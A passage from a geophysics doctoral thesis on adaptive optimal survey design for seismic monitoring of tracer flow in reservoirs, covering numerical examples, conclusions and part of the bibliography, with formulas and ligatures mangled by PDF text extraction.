(5.27)where \f is the Hadamard product.Unfortunately due to the inclusion of the monitor function fi , the computation ofthe gradient is slightly more complicated compared with the classic A-optimal designcase. Here the optimization requires solutions to two linear systems, Cz = v andCy = fi \f v compared with a single linear system for the classic A design. However,since only matrix vector products are required, the conjugate gradient method is usedto solve these systems avoiding ever forming C, since it requires only matrix vectorproducts.Due to the non-linearity of the design problem, iterative solution methods arerequired. Here, a gradient descent method is used for the solution of the problemwith a backtracking line search to solve for wk.685.3. Numerical optimization5.3.2 Inexact dynamicsTo minimize the noisy design function \b\fk(wk), the Hutchinson trace estimator isagain used to approximate the trace operation in Equation (5.22),\b\fk(wk) = v>diag(\u0016fik)\u0010(IF)>Wk(IF) +T>Q1kT+ \u000bI(L>L)\u00111v;(5.28)where\u0016fi = (fi0; fi1; : : : ; fik)>and v is a (k + 1)N \u0002 1 vector of evenly distributedvalues of [1; 1]. As in the noiseless case, again note that the computation of thegradient of \b\fkinvolves the computation of the gradient of a large dense inversematrix. Therefore, the vector z = (z0; : : : ; zk)>is de\fned such that\u0010(IF)>Wk(IF) +T>Q1kT+ \u000bI(L>L)\u0011z = v: (5.29)Di\u000berentiating with respect to wk, and solving for J =dzdvresults inJ = \u0010(IF)>Wk(IF) +T>Q1kT+ \u000bI(L>L)\u00111B: (5.30)whereB [email protected]>diag(Fzk)1CCCCCCCA: (5.31)695.4. Numerical examplesSubstituting J back into the gradient of the design objective function and transposinggives,r\b\fk(wk) = B>y+ \fe; (5.32)wherey =\u0010(IF)>Wk(IF) +T>Q1kT+ \u000bI(L>L)\u0011>(\u0016fi \f\u0016v): (5.33)To solve for z and y, the preconditioned conjugate gradient method was used to avoidforming the large matrices. The steepest descent method was used for the non-lineardesign optimization.5.4 Numerical examplesThe adaptive design method is demonstrated for the reservoir monitoring simulationusing the tomography experiment and tracer advection. The survey was designed tofully demonstrate the ability of the method to track motion and areas of interest inthe model. The example consists of a circular volume of tracer moving vertically. Thedynamics governing the motion of the tracer are described by the tracer advectionmodel, and imaged using the borehole seismic tomography survey.The partial di\u000berential equations governing both the seismic tomography experi-ment (Equation (2.1)) and the tracer dynamics, (Equation (2.3)) are discretized on a2D computational domain = [0; 400]\u0002 [0; 100]m, divided into [100; 50] cells of widthh = [4; 2]m. The uid velocity \feld u was computed by solving Equations (2.3b) and(2.3c) with a constant hydraulic conductivity for 10m3\u0001 day=kg, and pumping rate of150m3=s.705.4. Numerical examplesFigure 5.1: Initial experiment setup. Tomography sources are pictured in green onthe left and receivers in blue on the right. The initial setup covers the entire owdomain with 20 sources and 30 receivers. There is one source of uid, pumped at aconstant rate from the top green point, and a sink at the bottom (red) of the domain.Flow is in the downward direction.715.4. Numerical examples5.4.1 RegularizationTwo di\u000berent inversions were carried out to recover models mkby applying twodi\u000berent regularization functions. First a linear inversion was performed where theregularization operator L = I was assigned to promote smallness in the recoveredmodels. Alternately, L = GRAD is a common choice to promote smooth edges in themodels. However, since the original model has sharp edges, using a smooth recoverymay lead to more inaccurate results.Second, a non-linear inversion was performed with smoothed total variation (TV)as the regularization (Ascher et al., 2006). The total variation regularization pro-motes discontinuous boundaries, or sharp edges. This is particularly valid for thisexperiment since the tracer advection model does not include a di\u000busion term. Thetracer model is concentrated in the circle and zero everywhere else. In this ideal casethere should be no di\u000busion of the tracer, and thus the boundaries should remainsharp as the tracer moves along in the uid velocity \feld.In continuous space, smoothed total variation is described by the following rela-tion,R(m) =Zffi(jrmj) d~x; (5.34)where the convex function ffi(c) =pc2+ \u000f, is an approximation to the `1norm.A standard discrete approximation for the smoothed total variation regularizationfound in (Ascher et al., 2006) is,R(m) = h2e>qAcf((GRAD m)\f (GRAD m)) + \u000f; (5.35)where the gradient operator, GRAD, maps from cell centers to cell faces, and theaveraging matrix Acfmaps from faces to cell centers.725.4. Numerical examplesAlthough the optimal design method was formulated based on a linear estimationof mk, it is not unreasonable to estimate mkusing the optimal design for the linearmodel estimation problem with a non-linear regularization, provided that this willcontribute to recovering the best estimates of mk. As can be seen in Figure 5.2below, the overall relative model error for estimates recovered with the total variationregularization is signi\fcantly lower than that of the models estimated using the linearregularization. Thus the estimates obtained using the TV regularization are moreaccurate with respect to the true model for this particular problem. Since the monitorfunction has a very large impact on the future optimal designs, it is desirable to getthe best possible estimate of mk.Figure 5.2: Plot of the relative error (kmtrue1bm1k=(kmtrue1k)) versus the regular-ization parameter \u000b for both the linear regularization and smoothed total variation.The TV regularization gives a better estimate of the model for the case of a sharptarget.735.5. Design results: exact dynamics5.4.2 Monitor functionTo design only for the tracer and not the entire reservoir, the monitor function deltais de\fned by \u000e = jmkmbj, where mbis the background model (that is, the modelwithout the dynamic target). Because neither the estimated model nor the back-ground model are perfect, a threshold value \u0012 was chosen to remove unwanted orerroneous information from \u000e where the background model mb, is the model used tocompute the velocity \feld in Equation (2.3c).5.5 Design results: exact dynamicsFor the exact case, data were simulated by marching the tracer along in time for timesteps of 25 days and measured by conducting a tomography survey at each time with4% Gaussian noise added to each data set. In total 9 experiments were conducted fortimes t0; t1; :::; t8.The initial design for time point t0did not include the dynamics. This amounts tosetting fi0= 1 everywhere. The design optimization problem in this case is identicalto the static case and produces an optimal design based only on the physics andinformation from the linear regularization operator L = I. This is apparent in boththe plot of the weights for experiment 1 at time t0in Figure 5.3 and the image of therays in Figure 5.5, where the design speci\fes fewer rays that cover the entire domain.For each experiment the amse was plotted versus the number of nonzero weightsfor a set of penalty parameters \f, see Figure 5.3 for examples for times t0; t2; t4. Fromthese curves, the best set of weights were chosen such that the weights were sparse,but also so the amse was kept reasonably small. After a set of weights was chosen,both m0and the current model mkwere reconstructed from the reduced set of datadk, in addition to reconstruction obtained from the original A-optimal design from t0,and using all data for both the linear regularization and TV. The values of d which745.5. Design results: exact dynamicsFigure 5.3: Exact dynamics: plots of the adapted mean squared error amse vs. thenumber of nonzero weights (left column), and the weights used to conduct experiments1, 3, and 5, at times t0; t2; t4.755.5. Design results: exact dynamicscontribute to the reduced data set correspond to the non-zero weights of wk. Thetotal number of data required to image the models is signi\fcantly reduced. In mostcases the number of data are on average 60 of a possible 600.The model error was then calculated for each case with respect to the groundtruth, true model for each experiment, and is plotted in Figure 5.4. It is clear fromthe \fgure that models estimated using all data have the lowest mse compared with thetrue model. However, those constructed with the reduced set, particularly when usingthe TV regularization, are not far o\u000b. This implies that one can gain a reasonableestimate of the model from a signi\fcantly reduced set of data, without giving up toomuch on accuracy.In Figure 5.5 the rays corresponding to dkused to estimate the current modelsare pictured in blue over an image of the model. Note that the rays tend to follow thetarget as it moves through the domain and pass through the tracer. There are somespurious rays that do not pass through the tracer which are included in the optimaldesign. However, since the design depends on the monitor function fi (bm0), and thereconstructions ofbm0are never exact, these spurious rays are expected.It is also apparent that the number of spurious rays increases further in time eventhough estimates ofm0improve as more data are collected. In particular, at time t6itappears that the design algorithm has a harder time generating a design that capturesthe target well. There are many more rays which do not pass through the target. Thisis partially due to the increasing number of multiplications by the transport matrixT as time progresses, compounding errors, but also the loss of mass as the tracerexits the domain out of the sink. This is also apparent in the error calculations inFigure 5.4, where even while estimating models using all data, the error increases overtime. However, the designs still provide enough information to recover models whichindicate the location of the tracer. The reconstructions of mkwith smoothed totalvariation as the regularization are much closer to the true models, even when the765.5. Design results: exact dynamics0 5 10experiment (k)00.10.20.30.40.50.60.70.80.91relative errorLinear Regularization||mktrue-mkAll data||/||mktrue||||mktrue-mkadaptive linear||/||mktrue||||mktrue-mkA-Opt linear||/||mktrue||0 5 10experiment (k)00.10.20.30.40.50.60.70.80.91relative errorTotal Variation Regularization||mktrue-mkAll data TV||/||mktrue||||mktrue-mkadative TV||/||mktrue||||mktrue-mkA-Opt TV||/||mktrue||Figure 5.4: Exact dynamics: relative error plots. Model error is compared for eachexperiment for both the linear and TV regularization775.6. Results: inexact dynamicsoptimal design was computed for the linear regularization model estimation problem.Again, this is to be expected since the true model has discontinuous edges, and sincethere is no di\u000busion in the ow model.5.6 Results: inexact dynamicsFor the \frst experiment w0, the initial experiment computed in the noiseless examplewas used in the subsequent design estimations. The covariance matrices Qkwereassigned a scalar value for the variance for each time step to represent independentlyand identically distributed (iid) noise in the dynamics, such that Qk= ffkI. A con-stant value was assigned for the standard deviation, ffk= 0:2, for all experiments.Models were reconstructed using the non-linear smoothed total variation regulariza-tion, and also with the linear regularization. The model estimation error is plottedin Figure 5.6.Models were estimated using all data, the initial A-optimal design for each exper-iment, and \fnally using the adaptive method reduced data set. It is again clear thatinversion carried out using all data generated models with the lowest mse, however,the bene\ft of reducing the number of measurements to approximately 60 from 600might be much greater than the loss in accuracy in the model estimates, depending onthe cost of data acquisition. The designs, and models estimates are pictured in Figure5.7, below. Notice that in this case there are fewer spurious rays. It is apparent thatadapted A-optimal designs were again able to track the motion of the tracer with asigni\fcantly reduced set of measurements.5.7 SummaryIn this chapter, a new method for the design of experiments for dynamical systemswas presented. The method generates survey designs which adapt to the motion of785.7. Summaryexp:1 exp:2 exp:3 exp:4 exp:5 exp:6 exp:7 exp:8 exp:9mtrue0 mtrue1 mtrue2 mtrue3 mtrue4 mtrue5 mtrue6 mtrue7 mtrue8mTV0 mTV1 mTV2 mTV3 mTV4 mTV5 mTV6 mTV7 mTV8#d=297mlinear0#d=69mlinear1#d=73mlinear2#d=61mlinear3#d=77mlinear4#d=55mlinear5#d=76mlinear6#d=61mlinear7#d=35mlinear8Figure 5.5: Exact dynamics: optimal designs and recovered models for 9 experiments.The top row shows the rays and the recovered model, with the number of rays (#d =297) given below, followed by the true models in the second row, the models recoveredusing total variation in the third row, and \fnally the models recovered using the lineargradient regularization.795.7. Summary0 5 10experiment (k)00.10.20.30.40.50.60.70.80.91relative errorLinear Regularization||mktrue-mkAll data||/||mktrue||||mktrue-mkadaptive linear||/||mktrue||||mktrue-mkA-Opt linear||/||mktrue||0 5 10experiment (k)00.10.20.30.40.50.60.70.80.91relative errorTotal Variation Regularization||mktrue-mkAll data TV||/||mktrue||||mktrue-mkadative TV||/||mktrue||||mktrue-mkA-Opt TV||/||mktrue||Figure 5.6: Inexact dynamics: relative error plots. Model error is compared for eachexperiment for both the linear and TV regularizationspeci\fc areas of the model while incorporating historic data. The motivation for notsimply applying static optimal design methods to the dynamic problem is that themean squared error of the current estimated model never contains information fromprevious data. To this end, the design optimization problem \\knows\" nothing aboutthe changes in the model due to the dynamics and thus designs that are based onclassical formulations only reect information from the physics and the regularization(or prior) of the estimation problem.The adaptive optimal experimental design approach is based on the introductionof a monitor function to scale the mean squared error of an estimator whose motion isgoverned by a dynamical system, according to historic data. To determine a design fora future experiment, the adaptive mse (amse) is minimized with the added constraint805.7. Summarythat the design is sparse. Two model estimation problems were considered, whoseconstruction depends on the characterization of the error in the dynamical system.This leads to experimental designs that track the changes in the model with a reducedset of measurements. The methodology was tested using seismic tomography to imagethe advection of a tracer in a reservoir.815.7. Summaryexp:1 exp:2 exp:3 exp:4 exp:5 exp:6 exp:7 exp:8 exp:9mtrue0 mtrue1 mtrue2 mtrue3 mtrue4 mtrue5 mtrue6 mtrue7 mtrue8mTV0 mTV1 mTV2 mTV3 mTV4 mTV5 mTV6 mTV7 mTV8#d=297mlinear0#d=79mlinear1#d=59mlinear2#d=67mlinear3#d=81mlinear4#d=62mlinear5#d=53mlinear6#d=51mlinear7#d=61mlinear8Figure 5.7: Inexact dynamics: optimal designs and recovered models for 9 experi-ments. The top row shows the rays and the recovered model, with the number ofrays given below. The second row pictures true models, the third shows the modelsrecovered using total variation, and \fnally the bottom shows models recovered usingthe linear gradient regularization.82Chapter 6ConclusionsThe main objective of the research presented in this thesis was to improve reservoirmonitoring and forecasting by coupling geophysical survey techniques with a dynamicuid ow model and optimally designing the geophysical survey.Forecasting of ow within a reservoir requires knowledge of uid ow parameters,such as hydraulic conductivity. Estimates of such parameters can be obtained by di-rect measurements from subsurface rock samples, or though the inversion of ow data.However, these estimates are often highly inaccurate due to sparse measurements ofboth the parameters and ow data.Therefore, one approach investigated in this thesis is to include a higher samplingof measurements without adding a large additional cost to the monitoring program,was to couple a geophysical survey with the dynamic uid ow model in a singleinverse problem, such that the unknown ow parameters could be estimated fromgeophysical data.Geophysical surveys tend to cover much larger spatial areas at lower cost sincesensors can be deployed at the surface as well as below ground. Collecting uid owdata requires expensive boreholes, and is thus sparsely sampled. In the context of anill-posed under-determined inverse problem, it is very di\u000ecult to estimate parametermodels for large subsurface domains with little data. Thus, the greater number ofdata and spatial coverage improves the estimates obtained by solving the coupledill-posed inverse problem.83Chapter 6. ConclusionsThe second approach to improve reservoir monitoring proposed in this thesis wasto compute optimal geophysical survey designs for data measurements for the coupledsubsurface ow inverse problem. In this case, it is ine\u000ecient to be collecting data overregions of the subsurface where there is no change to the geophysical properties dueto ow. Ideally, one would want to be able to adapt the survey with the changesin the subsurface ow. However, traditional optimal design methods do not utilizehistoric estimates of the subsurface models in a way that includes them in the designoptimization problem. To this end, the idea was to formulate an optimal designestimation method for the coupled geophysics and ow model inverse problem thatincludes historic model estimates.To demonstrate the ideas proposed in the thesis, the physical models for thegeophysical survey and the uid ow model were \frst presented in Chapter 2. Thechoice of models was particularly important for the coupling problem. The seismictomography experiment was chosen primarily due to its linearity, but also due the factthat data can be collected from existing boreholes as well as from sensors placed on thesurface. Borehole seismic tomography is also commonly used in practice, with a widevariety of applications, making it an ideal survey for the model reservoir monitoringproblem.The tracer advection model was used because of its linearity and because it is verysimilar mathematically to more complex multiple phase ow models. In addition, aswas shown in Section 2.3, the advection of the tracer can also be thought of as theadvection of the seismic slowness. This result eliminates the need for a petrophysi-cal function relating the geophysical properties (seismic slowness) to ow parameters(tracer or hydraulic conductivity). Technically, the tracer advection model lends itselfto e\u000ecient numerical optimization schemes, in particular a stable and di\u000berentiablediscretization of the physical models was applied. For the discretization of the owa Particle-In-Cell method was used, whose stability is independent of the time-step84Chapter 6. Conclusionssize and therefore can be safely applied, even if the uid velocity \feld is unknown.The uid velocity \feld was discretized on staggered grids, resulting in a stable dis-cretization of the regularization operators and ow constraints, see Section 2.4 fordetails.Following the introduction of the physical models, Chapter 3 provides a briefintroduction to linear inversion and highlights the di\u000berent formulations which resultfrom di\u000berent characterizations of the noise in the dynamical uid ow model: zeronoise and non-zero noise. The choice of noise characterization is important not onlybecause it results in di\u000berent formulations of the inverse problem, but also because itis often di\u000ecult to estimate a priori.In Chapter 4, a new methodology for estimating the initial tracer concentrationand uid velocity \feld from geophysical data was presented for the case where thenoise in the dynamical ow model was assumed to be zero for all times. The newestimation problem was formulated as a constrained inverse problem with a speci\f-cally tailored regularization for the velocity \feld that promotes discontinuities in thetangential components of the estimated ow \feld. Estimates of the velocity were thenused for the estimation of the hydraulic conductivity.Numerical results for a simple layered earth model with a homogeneous isotropicreservoir demonstrated that this new approach yields not only accurate estimates ofthe initial change to the slowness but, especially, accurate predictions of the uid owvelocity tracer evolution. The work was published in the SIAM Journal on Scienti\fcComputing (Fohring et al., 2014). However, a number of topics relating to the coupledgeophysics ow problem have yet to be studied.One important aspect of the inverse problem is the evaluation of uncertainty inthe ow. Although the error in the dynamic ow model was assumed to be zero, itis likely that measurement and numerical errors were propagated with the dynamicsthroughout the inverse problem. This was particularly apparent when the number85Chapter 6. Conclusionsof historic experiments, and thus time steps, increased. With increased times step-s, came an increase in the di\u000eculty in recovering an accurate approximation to thetrue velocity \feld. This is counter to what one would expect; that more informationshould provide better results, and is likely due to the noise propagation. In partic-ular, the particle in cell (PIC) discretization of the tracer advection equation relieson a bilinear interpolation. Bilinear interpolation error is quadratic, and thus witheach time step, and therefore each multiplication of the tracer by the interpolationmatrix, the error grows. Thus experimenting further with higher order interpolationsmay help to reduce error propagation. However, higher order interpolation functionsmay simultaneously add complexity to the inverse problem because of the di\u000ecultyassociated with computing gradients.An additional topic of research involves applying the coupled problem with morecomplex ow models. However, the use of such models might require the knowledgeof petrophysical parameter functions and the application of di\u000bering discretizationtechniques that are not necessarily stable for all time step lengths. This would leadto added complexity in the inverse problem, which would require innovative solutiontechniques.Finally, to truly demonstrate the ability of the method to recover uid ow pa-rameters, the conduction of a \feld or laboratory experiment to obtain a real data setis required to fully evaluate the contribution of the work to reservoir monitoring andgeophysical history matching.To address the second goal of the thesis, Chapter 5 presents a new adaptive optimalexperimental design method for the linear coupled reservoir monitoring problem. Thenew adapted mean square error (amse) method builds on classical A-Optimal designcriteria by altering the posterior mean squared error (mse) of a model estimate toinclude historic data. In the classic case the mse is minimized to recover an optimal set86Chapter 6. Conclusionsof measurements. Since the mse for the linear estimator includes only the physics andthe prior covariance matrix, designs do not adapt with the motion of the tracer. Theamse was therefore de\fned to include historic data through an introduced monitorfunction. Results presented in Section 5.4 demonstrate the amse method for thecoupled seismic tomography tracer advection. Applying the method produced designsthat tracked the motion of the tracer, while requiring signi\fcantly fewer measurementsto recover images of the tracer compared with using all data available. The amseoptimal design method research presented in the thesis is currently in the \fnal reviewprocess for publication in SIAM Journal on Uncertainty Quanti\fcation (Fohring andHaber, 2016).The idea to include historic information in the amse through the introduction ofa monitor function originates from adaptive mesh methods. In this thesis only twooptions for the monitor function were chosen and tested. Thus there is signi\fcantroom for further investigation of how di\u000bering monitor functions can a\u000bect optimaldesigns.The adapted design criteria presented in the thesis, only included reducing thenumber of measurements from a maximum set. However, in many cases it might bemore e\u000ecient to eliminate entire borehole locations, instead of just individual sensorlocations, and additionally impose a monitory cost on more expensive measurementlocations to quantitatively estimate cost reduction.Another avenue of investigation includes designing for dynamic coupled non-linearinverse problems. Current non-linear design methods are limited by the fact that thereis no closed form calculation of the posterior mean squared error. This results inexpensive bi-level design optimization problems that require training sets of possiblemodels. However, for the coupled dynamic problem there maybe room to includehistoric estimates through propagation of earlier time models to generate trainingsets.87Chapter 6. ConclusionsRecently (Alexanderian et al., 2015) presented a method for A-optimal design fornon-linear inverse problems where the posterior covariance matrix is approximated bya stochastic average over a set of data by an approximate Hessian. The method wasdemonstrated for an advection di\u000busion ow problem. Building on this method mightbe an interesting approach to introducing the adaptive design method for non-linearproblems.One might also ask how sensitive the adaptive optimal design is to variations inthe uid velocity \feld. This could be investigated by estimating and updating theow dynamics in time, and would amount to developing an adaptive optimal designmethod for the constrained variable projection problem, that is, for the non-linearow coupled inverse problem presented in Chapter 4.88BibliographyAbacioglu, Y., Oliver, D., and Reynolds, A. (2001). E\u000ecient reservoir history match-ing using subspace vectors. Computational Geosciences, 5(2):151{172.Abul, F. (2010). 4D Seismic History Matching Using the Ensemble Kalman Filter(EnKF): Possibilities and Challenges. PhD thesis, University of Bergen.Aggarwal, R., Demkowicz, M., and Marzouk, Y. M. (2015). Information-DrivenExperimental Design in Materials Science. In Information science for materialsdiscovery and design, volume 225, chapter 2, pages 13{44. Springer InternationalPublishing.Ajo-Franklin, J. B. (2009). Optimal experiment design for time-lapse traveltime to-mography. Geophysics, 74(4):Q27{Q40.Alexanderian, A., Petra, N., Stadler, G., and Ghattas, O. (2014). A-Optimal designof experiments for in\fnite-dimensional Bayesian linear inverse problems with regu-larized l0 - sparsi\fcation. SIAM Journal on Scienti\fc Computing, 36(5):2122{2148.Alexanderian, A., Petra, N., Stadler, G., and Ghattas, O. (2015). A fast and scal-able method for a-optimal design of experiments for in\fnite-dimensional bayesiannonlinear inverse problems. SIAM Journal on Scienti\fc Computing, pages 1{29.Alumbaugh, D. L. and Morrison, H. F. (1995). Monitoring subsurface changesover time with cross-well electromagnetic tomography. Geophysical Prospecting,43(7):873{902.89BibliographyAravkin, A. (2010). Robust Methods for Kalman Filtering / Smoothing and BundleAdjustment. PhD thesis, University of Washington.Aravkin, A. A. Y., Bell, B. B. M. B., Burke, J. J. V., and Pillonetto, G. (2013).Kalman smoothing and block tridiagonal systems: new connections and numericalstability results. arXiv preprint arXiv:1303.5237.Archie, G. (1942). The Electrical Resistivity Log as an Aid in Determining SomeReservoir Characteristics. Petroleum Technology, 146(October):54{62.Ascher, U. M., Haber, E., and Huang, H. (2006). On e\u000ective methods for im-plicit piecewise smooth surface recovery. SIAM Journal on Scienti\fc Computing,28(1):339{358.Atkinson, A. C. and Donev, A. N. (1992). Optimum Experimental Designs. ClarendonPress.Bardow, A. (2008). Optimal experimental design of ill-posed problems: The METERapproach. Computers & Chemical Engineering, 32(1-2):115{124.Benzi, M., Golub, G., and Liesen, J. (2005). Numerical solution of saddle pointproblems. Acta numerica.Biegler, L., Biros, G., Ghattas, O., Heinkenschloss, M., Keyes, D., Mallick, B., Mar-zouk, Y., Tenorio, L., Waanders, B. v. B., and Willcox, K., editors (2011). Large-Scale Inverse Problems and Quanti\fcation of Uncertainty. John Wiley & Sons.Cassiani, G., Bohm, G., Vesnaver, A., and Nicolich, R. (1998). A geostatisticalframework for incorporating seismic tomography auxiliary data into hydraulic con-ductivity estimation. Journal of Hydrology, 206(1-2):58{74.Chaloner, K. and Verdinelli, I. (1995). Bayesian Experimental Design : A Review.Statistical Science, 10(3):273{304.90BibliographyChan, T. F., Golub, G. H., and Mulet, P. (1999). A Nonlinear Primal-Dual Method forTotal Variation-Based Image Restoration. SIAM Journal on Scienti\fc Computing,20(6):1964{1977.Chen, Z., Huan, G., and Ma, Y. (2006). Computational Methods for Multiphase Flowsin Porous Media. SIAM.Cherno\u000b, H. (1972). Sequential analysis and optimal design, volume 8. SIAM.Chung, J., Haber, E., and Nagy, J. (2006). Numerical methods for coupled super-resolution. Inverse Problems, 22(4):1261{1272.Chung, J. M.-L. (2009). Numerical Approaches for Large Scale Illposed Inverse Prob-lems. PhD thesis, Emory University.Cockett, R. and Haber, E. (2016). A Numerical Method for Large Scale Estimation ofDistributed Hydraulic Conductivity from Richards Equation. Journal of Hydrology,pages 1{15.Curtis, A. (1999). Optimal experiment design: cross-borehole tomographic examples.Geophysical Journal International, 136(3):637{650.Doyen, P. M. (1988). Porosity from seismic data: A geostatistical approach. Geo-physics, 53(10):1263{1275.Edwards, E. and Bridson, R. (2012). A high-order accurate particle-in-cell method.International Journal for Numerical Methods in Engineering, 90(9):1073{1088.Emerick, A. a. and Reynolds, A. C. (2012). History matching time-lapse seismic datausing the ensemble Kalman \flter with multiple data assimilations. ComputationalGeosciences, 16(3):639{659.91BibliographyEvans, M. W. and Harlow, F. H. (1957). The Particle-in-Cell Method for Hydrody-namic Calculations. Science (New York, N.Y.), 178(4066):76.Evensen, G. (1994). Sequential data assimilation with a nonlinear quasi-geostrophicmodel using Monte Carlo methods to forecast error statistics. Journal of Geophys-ical Research, 99(C5):10143.Fedorov, V. (1972). Theory Of Optimal Experiments. Elsevier.Fletcher, C. (2012). Computational Techniques for Fluid Dynamics 2: Speci\fc Tech-niques for Di\u000berent Flow Categories. Springer Science & Business Media.Fohring, J. and Haber, E. (2016). Adaptive A-optimal experimental design for lineardynamical systems. SIAM Journal on Uncertainty Quanti\fcation, xx:1{19.Fohring, J., Haber, E., and Ruthotto, L. (2014). Geophysical imaging of uid ow inporous media. SIAM Journal on Scienti\fc Computing, 36(5):218{236.Fohring, J., Ruthotto, L., and Haber, E. (2013). Geophysical Imaging, ReservoirHistory Matching and Forecasting. In 2013 SEG Annual Meeting, Houston. Societyof Exploration Geophysicists.Gerritsen, M. G. and Durlofsky, L. J. (2005). Modeling Fluid Flow in Oil Reservoirs.Annual Review of Fluid Mechanics, 37(1):211{238.Gharamti, M. E., Mazouk, Y. M., Huan, X., and Hoteit, I. (2015). A greedy approachfor placement of subsurface aquifer wells in an enseble \fltering framework. InDynamic Data-Driven Environmental Systems Science, volume 8964, pages 301{309. Springer International Publishing, Switzerland.Golub, G. and Greif, C. (2003). On solving block-structured inde\fnite linear systems.SIAM Journal on Scienti\fc Computing.92BibliographyGolub, G. and Pereyra, V. (2003). Separable nonlinear least squares: the variableprojection method and its applications. Inverse Problems, 19(2):R1{R26.Gosselin, O., Total, E., Uk, P., Aanonsen, S. I., Aavatsmark, I., Hydro, N., andCominelli, A. (2003). History matching Using Time-lapse Seismic ( HUTS ). InSPE Annual Technical Conference and Exhibition, pages 1{15.Haber, E. and Ascher, U. (2001). Fast \fnite volume simulation of 3D electromag-netic problems with highly discontinuous coe\u000ecients. SIAM Journal on Scienti\fcComputing.Haber, E., Horesh, L., and Tenorio, L. (2008). Numerical methods for experi-mental design of large-scale linear ill-posed inverse problems. Inverse Problems,24(5):055012.Haber, E., Horesh, L., and Tenorio, L. (2010). Numerical methods for the de-sign of large-scale nonlinear discrete ill-posed inverse problems. Inverse Problems,26(2):025002.Haber, E., Magnant, Z., and Lucero, C. (2011). Numerical methods for A -optimaldesigns with a sparsity constraint. Computational Optimization and Applications,52(1):293{314.Hansen, P. (1998). Rank-de\fcient and discrete ill-posed problems: numerical aspectsof linear inversion. SIAM.Hoversten, G. M., Cassassuce, F., Gasperikova, E., Newman, G. a., Chen, J., Rubin,Y., Hou, Z., and Vasco, D. (2006). Direct reservoir parameter estimation usingjoint inversion of marine seismic AVA and CSEM data. Geophysics, 71(3):C1.Huan, X. and Marzouk, Y. M. (2013). Simulation-based optimal Bayesian experimen-tal design for nonlinear systems. Journal of Computational Physics, 232(1):288{317.93BibliographyHuang, H., Haber, E., and Horesh, L. (2012). Optimal estimation of L1-regularizationprior from a regularized empirical bayesian risk standpoint. Inverse Problems andImaging, 6(0):447{464.Hubbard, S. S. and Rubin, Y. (2000). Hydrogeological parameter estimation usinggeophysical data: a review of selected techniques.Hutchinson, M. (1990). A stochastic estimator of the trace of the inuence matrixfor laplacian smoothing splines. Communications in Statistics - Simulation andComputation, 19(2)(April 2015):433{450.Hyndman, D. W., Harris, J. M., and Gorelick, S. M. (1994). Coupled seismic and trac-er test inversion for aquifer property characterization. Water Resources Research,30(7):1965.Jones, I. F. (2010). Tutorial: Velocity estimation via ray-based tomography. FirstBreak, 28(2):45{52.Kalman, R. E. (1960). A New Approach to Linear Filtering and Prediction Problems1. Transaction of the ASME - Journal of Basic Engineering, 82(Series D):35{45.Khodja, M. R., Prange, M. D., and Djikpesse, H. A. (2010). Guided Bayesian optimalexperimental design. Inverse Problems, 26(5):055008.Lucero, C. (2013). Bayes risk A-optimal experimental design for ill-posed inverseproblems. PhD thesis, Colorado School of Mines.Lumley, D. E. (2001a). The next wave in reservoir monitoring: The instrumented oil\feld. The Leading Edge, 20(6):640{648.Lumley, D. E. (2001b). Timelapse seismic reservoir monitoring. Geophysics, 66(1):50{53.94BibliographyMavko, G., Mukerji, T., and Dvorkin, J. (2009). The Rock Physics Handbook. Cam-bridge University Press.McKee, S., Tom, M. F., Ferreira, V. G., Cuminato, J. A., Castelo, A., Sousa, F. S.,and Mangiavacchi, N. (2008). The MAC method. Computers and Fluids, 37(8):907{930.Mezghani, M., Fornel, A., Langlais, V., Lucet, N., and Francais, I. (2013). HistoryMatching and Quantitative Use of 4D Seismic Data for an Improved ReservoirCharacterization. In SPE Annual Technical Conference and Exhibition. Society ofPetroleum Engineers.Modersitzki, J. (2009). FAIR: Flexible Algorithms for Image Registration. SIAM.N\u001avdal, G., Mannseth, T., and Vefring, E. H. (2002). SPE 75235 Near-Well ReservoirMonitoring Through Ensemble Kalman Filter. SPE International, 75235(1):1{9.Nenna, V., Pidlisecky, A., and Knight, R. (2011). Application of an extended Kalman\flter approach to inversion of time-lapse electrical resistivity imaging data for mon-itoring recharge. Water Resources Research, 47(10):1{13.Nocedal, J. and Wright, S. (2000). Numerical Optimization. Springer Science &Business Media.Nolet, G. (1987). Seismic Tomography: With Applications in Global Seismology andExploration Geophysics. Springer Science & Business Media.Oldenburg, D. and Pratt, D. (2002). Geophysical inversion for mineral exploration.Geophysical Inversion Facility.Oliver, D. S. and Chen, Y. (2010). Recent progress on reservoir history matching: areview. Computational Geosciences, 15(1):185{221.95BibliographyOliver, D. S., Reynolds, A. C., and Liu, N. (2008). Inverse Theory for PetroleumReservoir Characterization and History Matching. Cambridge University Press.Papalambros, P. Y. and Wilde, D. J. (2000). Principles of optimal design: modelingand computation. Cambridge university press.Parker, R. L. (1994). Geophysical Inverse Theory. Princeton University Press.Pollock, D. and Cirpka, O. a. (2012). Fully coupled hydrogeophysical inversion of alaboratory salt tracer experiment monitored by electrical resistivity tomography.Water Resources Research, 48(January):1{13.Pukelsheim, F. and Studden, W. J. (1993). E-Optimal Designs for Polynomial Re-gression. The Annals of Statistics, 21(1):402{415.Roubinet, D., de Dreuzy, J.-R., and Tartakovsky, D. M. (2013). Particle-trackingsimulations of anomalous transport in hierarchically fractured rocks. Computers &Geosciences, 50:52{58.Sagnol, G. and Harman, R. (2014). Optimal Designs for Steady-state Kalman \flters.ZIB Report, 39(October).Sarma, P., Durlofsky, L. J., Aziz, K., and Chen, W. H. (2013). A New Approachto Automatic History Matching Using Kernel PCA. In SPE Reservoir SimulationSymposium. Society of Petroleum Engineers.Slater, L., a.M Binley, Daily, W., and Johnson, R. (2000). Cross-hole electrical imag-ing of a controlled saline tracer injection. Journal of Applied Geophysics, 44(2-3):85{102.Stark, P. B. and Tenorio, L. (2010). A Primer of Frequentist and Bayesian Inference inInverse Problems. Large-Scale Inverse Problems and Quanti\fcation of Uncertainty,pages 9{32.96BibliographySteklova, K. and Haber, E. (2015). Joint Hydrogeophysical Inversion : State Estima-tion for Seawater Intrusion Models in 3D. Journal of Hydrology.Tenorio, L. (2001). Statistical Regularization of Inverse Problems. SIAM Review,43(2):347{366.Tikhonov, A. and Arsenin, V. (1977). Solutions of Ill-Posed Problems. Winston, NewYork.Trani, M. (2012). From time-lapse seismic inversion to history matching of waterooded oil reservoirs. PhD thesis, Delft University.Vasco, D. W., DattaGupta, A., Behrens, R., Condon, P., and Rickett, J. (2004). Seis-mic imaging of reservoir ow properties: Timelapse amplitude changes. Geophysics,69(6):1425{1442.Vauhkonen, M., Karjalainen, P. a., and Kaipio, J. P. (1998). A Kalman \flter ap-proach to track fast impedance changes in electrical impedance tomography. IEEEtransactions on bio-medical 